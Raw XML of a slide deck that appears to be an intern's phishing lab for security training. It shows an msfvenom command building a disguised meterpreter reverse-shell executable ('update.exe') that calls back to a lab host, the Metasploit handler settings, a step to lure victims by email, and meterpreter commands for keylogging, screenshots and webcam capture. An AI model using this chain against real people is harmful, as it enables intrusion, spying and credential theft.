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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="349" r:id="rId4"/>
    <p:sldId id="353" r:id="rId5"/>
    <p:sldId id="298" r:id="rId6"/>
    <p:sldId id="309" r:id="rId7"/>
    <p:sldId id="310" r:id="rId8"/>
    <p:sldId id="314" r:id="rId9"/>
    <p:sldId id="354" r:id="rId10"/>
    <p:sldId id="355" r:id="rId11"/>
    <p:sldId id="356" r:id="rId12"/>
    <p:sldId id="357" r:id="rId13"/>
    <p:sldId id="359" r:id="rId14"/>
    <p:sldId id="358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4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[IP]/update.exe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5961778" y="1674674"/>
            <a:ext cx="574145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Initial Access Lab 1: Phishing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5961847" y="3429000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Nguyen Minh Tuan, SEEE@HUST-2023/Intern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SOC@Vsec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2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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B1498DD-2881-F012-1DAF-19FE2D87C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6" y="2340015"/>
            <a:ext cx="11367061" cy="3032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1835AF-5AE9-A6F2-3CD8-8B2772CB5B78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597776" y="1509623"/>
            <a:ext cx="1129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Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=192.168.77.131 –f exe &gt; /var/www/html/update.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164365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apache2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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95494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text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4823275A-0C77-99B9-527E-F69EED991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02" y="3015575"/>
            <a:ext cx="10972985" cy="168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4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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to start exploiting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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 shot of a computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A43167-883E-B4D2-66EF-95B605DDB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4" y="1236208"/>
            <a:ext cx="10610490" cy="5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1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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to start exploiting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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9BB7F-C176-977F-7AF9-B1B30E427527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888521" y="1293962"/>
            <a:ext cx="7392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Settings:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- use multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- set LHOST 0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- ser LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- Exploit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800" dirty="0"/>
              <a:t>Send an email including the link to trick them into clicking in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187158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IV, Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a chat&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA239F44-EFCF-5AA9-8304-ACC1E73B3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42" y="1215756"/>
            <a:ext cx="9614140" cy="54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0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IV, Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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ECA6A6FC-2226-5313-813A-FFC41151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1" y="2293719"/>
            <a:ext cx="9101737" cy="156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6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Connection Established</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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B41D1-8512-B554-A2C2-FB18A72A0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42" y="3032277"/>
            <a:ext cx="10641982" cy="114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Migrate to another process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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EF8245A-2B33-C71A-9730-4F4B4646A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8" y="2287768"/>
            <a:ext cx="10660143" cy="22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9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Keystroke Dumping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2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DAD11D-04C4-7669-EA8B-FD0B0E8B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5" y="2645520"/>
            <a:ext cx="9805682" cy="376404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35DB519-7788-D9C1-3E3C-7A354F69E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5" y="1146448"/>
            <a:ext cx="5498225" cy="11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Keystroke Dumping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2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843CF4E-D779-417C-8348-BA1435F5B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50" y="1172199"/>
            <a:ext cx="5695619" cy="748421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A computer screen shot of a blue background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B750063-F6E1-49E3-4AE6-A7E2A64D6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51" y="2299536"/>
            <a:ext cx="9678587" cy="43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3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455514"/>
            <a:ext cx="299468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Table of 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6B052-A3E2-A521-1CCC-ADDF533FC93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563736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674D2-1A0E-5F58-6D7E-A85CC1340298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5270741" y="1771471"/>
            <a:ext cx="60858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Target Analysis/Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p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II, Payload</a:t>
            </a:r>
          </a:p>
          <a:p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III, Building script</a:t>
            </a:r>
          </a:p>
          <a:p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IV, Exploit</a:t>
            </a:r>
          </a:p>
          <a:p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 What can we learn?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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Available Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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24352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7C318-A9B7-6C1E-84E6-C0F5CC7AA3B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750498" y="1659285"/>
            <a:ext cx="79449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Screenshot: capture the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: start capturing keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: stop capturing keys and then dump the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Webcam_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: shows the available webcams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: takes a photo with the webcam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Shell: Command prompt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Exit: leave the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> prompt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92439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IV, What can we learn?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B42B-14CA-4E81-806F-6104B1EFC216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7496004" y="1920263"/>
            <a:ext cx="3864628" cy="3896248"/>
            <a:chOff x="7496004" y="1920263"/>
            <a:chExt cx="3864628" cy="3896248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Isosceles Triangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857AEF3-2BAB-4B10-A92B-50F6B5652C4C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839502" y="4413955"/>
              <a:ext cx="427534" cy="471394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3E9BF2E0-BB0D-492B-B23D-18525C8DC865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7608221" y="2961416"/>
              <a:ext cx="392828" cy="319096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 Same Side Corner Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F874CADC-9EE2-4426-B491-ED504626F9E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="10824557" y="291708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CF6CB40C-AAE3-4BC0-BE1A-A2168066A4DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11062223" y="3784811"/>
              <a:ext cx="285020" cy="285020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24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6FAF72-CA89-49D3-B9C9-BC90661F2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7159" y="2346892"/>
              <a:ext cx="392828" cy="3039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Isosceles Triangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A45748F-6022-4AD8-BF16-FE4B5FA61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619" y="5355763"/>
              <a:ext cx="372889" cy="259826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2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4BD8663-EF58-4C8A-AD10-8B9671E1C8E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2498363">
              <a:off x="8831623" y="1920263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A76A8299-3263-47DF-B0DC-CFD8E87EA586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19470155">
              <a:off x="10110329" y="1972655"/>
              <a:ext cx="132806" cy="502999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2" name="자유형: 도형 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAE9AE7-5A5C-4C0B-A820-235CA68F560D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="9503918" y="5364438"/>
              <a:ext cx="71616" cy="502304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C623668A-E552-4FA0-A1ED-1AFADAD25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073" y="5282722"/>
              <a:ext cx="141778" cy="392828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33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02331B79-8E44-4749-B2E2-C6816EB456CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="9233259" y="1922064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30243713-6F14-4FF0-949D-ABED94C7AA9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8136976" y="5049647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5CB07C1-BE6E-406A-AB6E-734C2C1E8101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9626515" y="1969444"/>
              <a:ext cx="330976" cy="339180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2C0B57BA-B464-44AF-84E3-35CE5FDD7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5361" y="4863776"/>
              <a:ext cx="330939" cy="234666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7D2BFFAC-4745-4323-A6BF-5D92BA1E2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475" y="4673961"/>
              <a:ext cx="330939" cy="330692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ounded Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52C9B96-B6E8-4A0F-B777-A4F587CA6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9746" y="4139499"/>
              <a:ext cx="330940" cy="232884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66C83CF2-9280-44CE-88E6-50B6B5A58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44" y="5398653"/>
              <a:ext cx="300703" cy="366439"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3240944" h="3949460">
                  <a:moveTo>
                    <a:pt x="2411668" y="919204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2652037" y="921566"/>
                    <a:pt x="2997179" y="1088232"/>
                    <a:pt x="3147060" y="1333480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2837519" y="1559133"/>
                    <a:pt x="2713715" y="1818123"/>
                    <a:pt x="2716116" y="2148550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2724370" y="2506677"/>
                    <a:pt x="2937416" y="2788602"/>
                    <a:pt x="3240944" y="2908604"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3111039" y="3296832"/>
                    <a:pt x="2835874" y="3920800"/>
                    <a:pt x="2360688" y="3949460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104982" y="3948826"/>
                    <a:pt x="1887379" y="3871989"/>
                    <a:pt x="1655487" y="3790391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1465920" y="3881513"/>
                    <a:pt x="1178719" y="3984543"/>
                    <a:pt x="936764" y="3932790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="634032" y="3867349"/>
                    <a:pt x="33306" y="3304229"/>
                    <a:pt x="0" y="2002921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5122" y="1625861"/>
                    <a:pt x="224231" y="988116"/>
                    <a:pt x="1004287" y="951010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1237754" y="955627"/>
                    <a:pt x="1430737" y="1013358"/>
                    <a:pt x="1654678" y="1150601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1907007" y="1025844"/>
                    <a:pt x="2042657" y="934423"/>
                    <a:pt x="2411668" y="919204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2423572" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2449670" y="236641"/>
                    <a:pt x="2449574" y="370890"/>
                    <a:pt x="2275646" y="605149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098536" y="787863"/>
                    <a:pt x="1909519" y="903902"/>
                    <a:pt x="1627634" y="908022"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1601565" y="662380"/>
                    <a:pt x="1689794" y="371496"/>
                    <a:pt x="1823269" y="256823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1945582" y="131527"/>
                    <a:pt x="2156003" y="39571"/>
                    <a:pt x="242357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4A3EBE81-5E07-4BBC-98BC-BA89E0429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500" y="2582839"/>
              <a:ext cx="300170" cy="347427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3319870" h="3842533">
                  <a:moveTo>
                    <a:pt x="579936" y="1296382"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="1296382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739936" y="2796543"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2739936" y="2962250"/>
                    <a:pt x="2605604" y="3096582"/>
                    <a:pt x="2439897" y="3096582"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272003" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2272003" y="3729696"/>
                    <a:pt x="2159166" y="3842533"/>
                    <a:pt x="2019975" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1880784" y="3842533"/>
                    <a:pt x="1767947" y="3729696"/>
                    <a:pt x="1767947" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1767947" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492066" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1492066" y="3729696"/>
                    <a:pt x="1379229" y="3842533"/>
                    <a:pt x="1240038" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1100847" y="3842533"/>
                    <a:pt x="988010" y="3729696"/>
                    <a:pt x="988010" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="988010" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879975" y="3096582"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="714268" y="3096582"/>
                    <a:pt x="579936" y="2962250"/>
                    <a:pt x="579936" y="2796543"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3067842" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3207033" y="1281925"/>
                    <a:pt x="3319870" y="1394762"/>
                    <a:pt x="3319870" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3319870" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3319870" y="2645088"/>
                    <a:pt x="3207033" y="2757925"/>
                    <a:pt x="3067842" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2928651" y="2757925"/>
                    <a:pt x="2815814" y="2645088"/>
                    <a:pt x="2815814" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2815814" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2815814" y="1394762"/>
                    <a:pt x="2928651" y="1281925"/>
                    <a:pt x="3067842" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="252028" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391219" y="1281925"/>
                    <a:pt x="504056" y="1394762"/>
                    <a:pt x="504056" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="504056" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="504056" y="2645088"/>
                    <a:pt x="391219" y="2757925"/>
                    <a:pt x="252028" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112837" y="2757925"/>
                    <a:pt x="0" y="2645088"/>
                    <a:pt x="0" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1394762"/>
                    <a:pt x="112837" y="1281925"/>
                    <a:pt x="252028" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134062" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2073373" y="558521"/>
                    <a:pt x="2024174" y="607720"/>
                    <a:pt x="2024174" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2024174" y="729098"/>
                    <a:pt x="2073373" y="778297"/>
                    <a:pt x="2134062" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194751" y="778297"/>
                    <a:pt x="2243950" y="729098"/>
                    <a:pt x="2243950" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2243950" y="607720"/>
                    <a:pt x="2194751" y="558521"/>
                    <a:pt x="2134062" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1177409" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1116720" y="558521"/>
                    <a:pt x="1067521" y="607720"/>
                    <a:pt x="1067521" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1067521" y="729098"/>
                    <a:pt x="1116720" y="778297"/>
                    <a:pt x="1177409" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1238098" y="778297"/>
                    <a:pt x="1287297" y="729098"/>
                    <a:pt x="1287297" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1287297" y="607720"/>
                    <a:pt x="1238098" y="558521"/>
                    <a:pt x="1177409" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1041854" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1215617" y="300965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1350827" y="238508"/>
                    <a:pt x="1501239" y="204386"/>
                    <a:pt x="1659158" y="204272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1823689" y="204153"/>
                    <a:pt x="1980124" y="240963"/>
                    <a:pt x="2119837" y="308065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2297698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2391229" y="54000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215205" y="358882"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2507692" y="533629"/>
                    <a:pt x="2710924" y="843756"/>
                    <a:pt x="2737127" y="1206450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018962" y="1206967"/>
                    <a:pt x="1300797" y="1207483"/>
                    <a:pt x="582632" y="1208000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608780" y="838665"/>
                    <a:pt x="818541" y="523565"/>
                    <a:pt x="1119462" y="350420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="948323" y="540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C0C7969F-A090-4D7D-AE69-318914512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5011" y="2518278"/>
              <a:ext cx="340001" cy="338281"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2956013" h="2941055"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B9186B4-3CAE-4B1B-9EE5-82556E22D24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45251" y="2251006"/>
              <a:ext cx="441966" cy="281210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AE4B125-6999-45DF-B3C8-56A855BA5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273" y="3365017"/>
              <a:ext cx="357359" cy="364685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3860876" h="3940019">
                  <a:moveTo>
                    <a:pt x="3248876" y="1942264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="1942264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="2090815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859023" y="2090815"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3817225" y="2949620"/>
                    <a:pt x="3215273" y="3679864"/>
                    <a:pt x="2378197" y="3884304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2219818" y="3922985"/>
                    <a:pt x="2060231" y="3941082"/>
                    <a:pt x="1902626" y="3939971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1286982" y="3935631"/>
                    <a:pt x="701577" y="3638194"/>
                    <a:pt x="337583" y="3128887"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30667" y="3435803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30667" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124425" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781340" y="2685130"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1079782" y="3180935"/>
                    <a:pt x="1667379" y="3425841"/>
                    <a:pt x="2232517" y="3287817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2810639" y="3146622"/>
                    <a:pt x="3224897" y="2638979"/>
                    <a:pt x="3247291" y="2044286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3248876" y="2044345"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1958249" y="48"/>
                  </a:moveTo>
